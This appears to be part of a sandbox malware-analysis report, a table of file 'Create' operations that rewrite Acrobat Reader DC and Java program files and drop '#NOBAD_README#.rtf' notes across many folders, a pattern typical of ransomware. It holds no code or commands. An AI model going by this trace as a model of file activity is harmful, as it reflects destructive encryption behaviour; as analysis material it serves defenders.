| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\Comb_field_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-down.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-up.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_sent.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\generic-rhp-app-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\require.min.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\classes.jsa | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\reflow.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvDX9.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\Comb_field_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-114x114-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\cloud_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\br.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_de.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\hscroll-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\form_responses.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_email.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
